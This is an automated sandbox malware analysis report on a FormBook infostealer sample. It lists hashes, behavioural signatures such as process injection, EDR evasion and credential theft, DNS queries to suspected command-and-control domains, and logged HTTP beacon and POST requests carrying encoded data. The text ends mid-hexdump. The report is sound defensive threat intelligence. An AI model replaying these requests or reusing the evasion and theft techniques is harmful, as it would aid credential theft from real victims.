Windows Analysis Report
SOA SIL TL382920.exe

Overview

General Information

Sample name:	SOA SIL TL382920.exe (renamed file extension from bat to exe)
Original sample name:	SOA SIL TL382920.bat
Analysis ID:	1527911
MD5:	caec46aaace8e50a9763dffc6c4acf0e
SHA1:	c22d85132ebd62cdf65ced2b203dca7f61490b89
SHA256:	664f584ad45e11d7afe3e4bb326959f6041653f22115327800341fa33eb19080
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Yara detected FormBook

Source: Yara match	File source: 2.2.SOA SIL TL382920.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SOA SIL TL382920.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.23445436246.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.23442870422.0000000001620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.21337354866.0000000006A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.23445613909.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: SOA SIL TL382920.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: SOA SIL TL382920.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SOA SIL TL382920.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: replace.pdb source: SOA SIL TL382920.exe, 00000002.00000002.21275498246.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: replace.pdbGCTL source: SOA SIL TL382920.exe, 00000002.00000002.21275498246.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Qpgk.pdbSHA256s source: SOA SIL TL382920.exe
Source:	Binary string: wntdll.pdbUGP source: SOA SIL TL382920.exe, 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.21278692852.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000003.21275121390.0000000002DF7000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: SOA SIL TL382920.exe, SOA SIL TL382920.exe, 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000004.00000003.21278692852.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000003.21275121390.0000000002DF7000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Qpgk.pdb source: SOA SIL TL382920.exe

Source: C:\Windows\SysWOW64\replace.exe

Code function: 4_2_028CC240 FindFirstFileW,FindNextFileW,FindClose,

4_2_028CC240

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\replace.exe	Code function: 4x nop then xor eax, eax		4_2_028B9A70
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4x nop then mov ebx, 00000004h		4_2_030604E0

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: www.online-dating28.xyz

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 217.160.0.27 217.160.0.27
Source: Joe Sandbox View	IP Address: 76.223.105.230 76.223.105.230

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /9eeu/?VzK4o8Jx=sYxoUF2rFRCkhaAkYvMCVRWDMjjY140d56kaE+tBLdvFK0LLAdAC/HAPE2DtjqQpoemNjozj05nG5pG/fmy7ZInj0cRDZa4AaOoOz07zrXAoLhIj+j079Eo=&0zu8A=o2yln6 HTTP/1.1Host: www.07t90q.vipAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /4yov/?VzK4o8Jx=wLmY7AOB32o0S2u43NcX1Hs/A4Ddj7cy6rFAsgDZdNn+sW1g/TF+eJLR19ZQOPzynTi6ZGviANY3o1+5ycRVlJFFydx+2g9CgM5kEaITnei6fXkYmlY6f3w=&0zu8A=o2yln6 HTTP/1.1Host: www.concept.pinkAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /j39u/?VzK4o8Jx=Bz1f0c7bYWyPEXgQGmGeUr0iAf+T5y0lnFtnj2cpqvgmCRIzB1oQIQU/LvP87UgGwTfaSD+LVTW+9AK3Nxg5tSpiWXbGTNqEKdm6W6Th2Oxx8WLr56YoU0o=&0zu8A=o2yln6 HTTP/1.1Host: www.kuaimaolife.shopAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /pnbu/?VzK4o8Jx=PMosseOB4ogJQUQqTcR9kz6RlTRioPzkM9evra3bwBIimbDRItYfTtmn+Yd6ynIhbdr7j07NPWQxaS6b0vcIX3tyVS9+K21fIwIr7IsLGACriLVoa4wujys=&0zu8A=o2yln6 HTTP/1.1Host: www.nodigitalsmoke.orgAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /pisq/?VzK4o8Jx=H7+I56BzzgTO14iYyfpq/0TXLnkw0DU3mxqOdQDMcBjOXdIUFfgl3gtbee+L6DVRaRQz5ZravCeTSBENiaLmUfkQqiezYkWa8l0+pkZP8o0fG616lfZJ+EU=&0zu8A=o2yln6 HTTP/1.1Host: www.synd.funAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /phw5/?0zu8A=o2yln6&VzK4o8Jx=0nIKn1KaCpmASYJA4heXTZJ4jJXOLVPKLZ7pkMbHJLxIA/G7tzth6jzDxIdIFtsfCbXgmV5eiC0y9vkRZyS1XzB4D/cnp4pLqlHudh8ra46zD/kGcOWFXek= HTTP/1.1Host: www.redlakedispensery.netAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /6nb6/?VzK4o8Jx=3cQdvvjXbDmN7AD1N3EtkTKSkRGpjOZJD5QOEJ2ov7AVnEoT92w2clvWuemcxfAXa005+24inGIyqDI1tlEn9qii/G7LnY+t45dZlk7rRI6PB0gsuL5FdqU=&0zu8A=o2yln6 HTTP/1.1Host: www.online-dating28.xyzAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /io0i/?0zu8A=o2yln6&VzK4o8Jx=SDiZucYNl7hAWjD3kY1F3Wh8SSqKLzQrPgO87aM6gvawjY1J8DLcjr26gXoQ9oM68w0z/Zj56CIgKdiiaxfLyhFp6oFJlK6eDMjbU8To92G67g984b8BKfg= HTTP/1.1Host: www.tribevas.onlineAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /f3n5/?VzK4o8Jx=dhj1q08La8WFEWo3xk5bQlyPjuL1dgahmkpS3NRsd6Y/mAIsEkGjeuU1SXWIZ8LAwVs2eJKJ0+NM44t35YuY5s8XjK0+kf3wgV05m6WJetyMkfq7N/qTBt8=&0zu8A=o2yln6 HTTP/1.1Host: www.stratogent.infoAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /acqm/?0zu8A=o2yln6&VzK4o8Jx=hOk1k3UNcVwpG+EJEDicqQpIOObLS/TgyY32GlBOoCoiXDXAZ6sWDP89y5CwOebPWohVlvJHYhDsteptd/L7YydfwpVPpt2oIMR5Kfz9plXO/BQcfDKFtuw= HTTP/1.1Host: www.it9.shopAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /xha2/?VzK4o8Jx=Rj3U+6DKgT5y3eE2BMi55/myWWswXqjiYm6dEeLSFSW8ImASiPiK/Z97R8zSc/+3mi0fAgijIiRKCB5FCR8rSXkZ7dd1+8Uof6hMEnAJapLXT04qmHdwDH0=&0zu8A=o2yln6 HTTP/1.1Host: www.artherapy.onlineAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /xlle/?VzK4o8Jx=e/yKpeJOjOfK3ogdJaNPolEHTgG8UOeOD7iGn6rK8RtZqhJ0uS/fq3wrSOZm1/LpQx9nm8RE0LQ7pT1GOQTyowfApUFnsluh2+dA7bAmT6aj2geZl7SaSIo=&0zu8A=o2yln6 HTTP/1.1Host: www.acuarelacr.buzzAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /dh2t/?VzK4o8Jx=OuJ8gnv9Mf0seMPZwgWqdoiXcL8RlvinjfaO7Y1P7N6K2HIOPUsL5gVusZwNUZykZEqB/DbtgQZV6EtzKFIFDF8htWObdeNACruwjJyoWYmCvw6DdWzPF9Q=&0zu8A=o2yln6 HTTP/1.1Host: www.toteforcar.siteAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /dndz/?VzK4o8Jx=yDZaovUERiFyto7X7qjvD9MpBTu9Oa8KDn0njxLOrnMFAtvfChH9CxwY1KA18WTPaaKEsGuRWrl0dmOTwKqBuB4/VF8aV5DH590ef19Cm2H2f9K3TYb4rxM=&0zu8A=o2yln6 HTTP/1.1Host: www.neuro-practicum.onlineAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /vbsv/?VzK4o8Jx=bE1tu4Njqer8fYE3ogT5h7aBRb2mTTstgFdh6ULQtUw7pAI4rpm78pT6sJrtnBlXzUrAExT6FvXu50MEINd+YE6s/Zqjf6ffoiebp1emg4fruBFCNZ4S/qE=&0zu8A=o2yln6 HTTP/1.1Host: www.ara-store.comAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.07t90q.vip
Source: global traffic	DNS traffic detected: DNS query: www.concept.pink
Source: global traffic	DNS traffic detected: DNS query: www.5oxzis.top
Source: global traffic	DNS traffic detected: DNS query: www.kuaimaolife.shop
Source: global traffic	DNS traffic detected: DNS query: www.nodigitalsmoke.org
Source: global traffic	DNS traffic detected: DNS query: www.synd.fun
Source: global traffic	DNS traffic detected: DNS query: www.redlakedispensery.net
Source: global traffic	DNS traffic detected: DNS query: www.online-dating28.xyz
Source: global traffic	DNS traffic detected: DNS query: www.tribevas.online
Source: global traffic	DNS traffic detected: DNS query: www.stratogent.info
Source: global traffic	DNS traffic detected: DNS query: www.it9.shop
Source: global traffic	DNS traffic detected: DNS query: www.artherapy.online
Source: global traffic	DNS traffic detected: DNS query: www.acuarelacr.buzz
Source: global traffic	DNS traffic detected: DNS query: www.toteforcar.site
Source: global traffic	DNS traffic detected: DNS query: www.neuro-practicum.online
Source: global traffic	DNS traffic detected: DNS query: www.ara-store.com

Source: unknown

HTTP traffic detected: POST /4yov/ HTTP/1.1Host: www.concept.pinkAccept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.concept.pinkReferer: http://www.concept.pink/4yov/Connection: closeContent-Length: 205Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 39 4a 4f 34 34 31 65 45 79 33 52 4e 55 48 36 6c 6f 64 38 50 2f 31 70 6e 4f 49 43 4d 39 59 30 4c 34 35 51 33 75 79 62 4f 48 65 6e 42 74 6b 31 2b 67 58 78 33 55 74 32 6a 6c 63 52 73 48 4c 6a 41 6e 44 7a 4c 52 79 2f 71 41 75 6b 45 74 67 61 37 6d 5a 38 37 76 66 46 50 38 2f 74 2b 6f 44 74 56 6f 4d 5a 30 51 4b 49 39 75 4c 66 2b 41 44 59 54 33 55 68 59 57 55 6c 4a 4f 51 5a 74 51 57 78 47 55 68 59 32 6c 34 4f 41 5a 65 4f 48 44 48 65 68 51 46 30 74 67 39 50 6c 76 73 32 74 7a 6a 32 75 4a 37 67 38 65 50 70 58 78 39 39 65 34 49 59 5a 4e 48 53 41 41 4e 7a 75 56 36 49 49 59 48 70 68 64 77 3d 3d Data Ascii: VzK4o8Jx=9JO441eEy3RNUH6lod8P/1pnOICM9Y0L45Q3uybOHenBtk1+gXx3Ut2jlcRsHLjAnDzLRy/qAukEtga7mZ87vfFP8/t+oDtVoMZ0QKI9uLf+ADYT3UhYWUlJOQZtQWxGUhY2l4OAZeOHDHehQF0tg9Plvs2tzj2uJ7g8ePpXx99e4IYZNHSAANzuV6IIYHphdw==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:51:49 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:51:51 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:51:54 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:51:57 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 